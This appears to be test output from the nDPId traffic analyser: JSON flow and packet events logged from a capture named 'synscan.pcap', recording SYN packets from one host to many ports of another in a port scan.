-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsCYIAADoGBPGsEAAIQA2GNIzTFb7dU4MZAAAAAGACDAAWzgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsr3QAADgGYP6sEAAIQA2GNIzTFYbdU4MZAAAAAGACBAAfBgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsZqgAADEGsMqsEAAIQA2GNIzTwATdU4MZAAAAAGACCABwhwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsBTkAADYGDTqsEAAIQA2GNIzTgAvdU4MZAAAAAGACDACsgAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsZFYAAC4GthysEAAIQA2GNIzSBAXdUoMYAAAAAGACDAAoigAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsbxoAACUGtFisEAAIQA2GNIzSB0jdUoMYAAAAAGACCAApRwAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsjUUAACwGjy2sEAAIQA2GNIzSA4XdUoMYAAAAAGACBAAxCgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsMeAAACgG7pKsEAAIQA2GNIzSA9XdUoMYAAAAAGACBAAwugAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsvrcAADgGUbusEAAIQA2GNIzSFbjdUoMYAAAAAGACBAAe1wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAszmQAAC4GTA6sEAAIQA2GNIzSC7\/dUoMYAAAAAGACDAAg0AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAswF0AACkGXxWsEAAIQA2GNIzSBF\/dUoMYAAAAAGACCAAsMAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsVtQAADQGvZ6sEAAIQA2GNIzS2QPdUoMYAAAAAGACBABbiwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsEBMAADUGA2CsEAAIQA2GNIzSDrbdUoMYAAAAAGACCAAh2QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsXHsAADYGtfesEAAIQA2GNIzSBkDdUoMYAAAAAGACDAAmTwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAs5n4AACgGOfSsEAAIQA2GNIzSBKjdUoMYAAAAAGACBAAv5wAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAs2vsAADIGO3esEAAIQA2GNIzSL47dUoMYAAAAAGACDAD9AAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAschMAACoGrF+sEAAIQA2GNIzSK2bdUoMYAAAAAGACDAABKQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsnCkAADcGdUmsEAAIQA2GNIzSOprdUoMYAAAAAGACEADt9AAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAspFoAADUGbxisEAAIQA2GNIzSMDndUoMYAAAAAGACCAAAVgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsF4AAADsG9fKsEAAIQA2GNIzSJvDdUoMYAAAAAGACEAABnwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsslAAADkGXSKsEAAIQA2GNIzSB7bdUoMYAAAAAGACCAAo2QAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsyZQAACwGUt6sEAAIQA2GNIzSJqzdUoMYAAAAAGACBAAN4wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsUYgAADkGveqsEAAIQA2GNIzSBIzdUoMYAAAAAGACCAAsAwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsDTcAAC8GDDysEAAIQA2GNIzSA4LdUoMYAAAAAGACEAAlDQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 